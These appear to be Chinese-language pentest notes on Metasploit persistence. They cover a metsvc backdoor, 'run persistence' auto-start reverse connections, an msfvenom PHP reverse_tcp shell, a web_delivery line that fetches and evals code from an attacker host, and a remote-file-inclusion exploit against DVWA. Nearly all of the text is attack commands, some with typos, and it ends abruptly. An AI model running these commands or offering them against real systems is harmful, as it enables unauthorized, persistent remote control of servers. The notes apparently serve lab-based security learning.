持久后门
- 利用漏洞取得的meterpreter shell 运行于内存中,重启失效。
- 重复explpoit漏洞可能造成服务器崩溃
- 持久后门保证漏洞修复后仍可远程控制
Meterpreter后门
run metsvc -A #删除 -r
sue exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337
set RHOST 1.1.1.1
持久后门
```powershell run persistence -h run persistence -X -i 10 -p 4444 -r 1.1.1.1 #-i参数为方向连接间隔 -X表示选择开机自启动。 run persistence -U -i 20 -p 4444 -r 1.1.1.1 #-p 表示主机侦听连接的端口
run persistence -S -i 20 -p 4444 -r 1.1.1.1 # -r 是连接应连接回的主机 IP 地址
<a name="F6jML"></a>
### PHP shell
```powershell
msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f
raw -o a.php
MSF 启动侦听
上传到web站点并通过浏览器访问
Web Delivery
利用代码执行漏洞访问攻击者服务器
use exploit/multi/script/web_delivery
set target 1
php -d allow_url_fopen=true -r “eval(file_get_contents(‘http://1.1.1.1/
fTYWqmu'));"
RFI远程文件包含
vi /etc/php5/cgi/php.ini #php info
▪ allow_url_fopen = On
▪ allow_url_include = On
use exploit/unix/webapp/php_include
set RHOST 1.1.1.2
set PATH /dvwa/vulnerabilities/fi/–
set PHPURI /?page=XXpathXX
set HEADERS "Cookie:security=low;
PHPSESSID=eefcf023ba61219d4745ad7487fe81d7"
set payload php/meterpreter/reverse_tcp
set lhost 1.1.1.1
exploi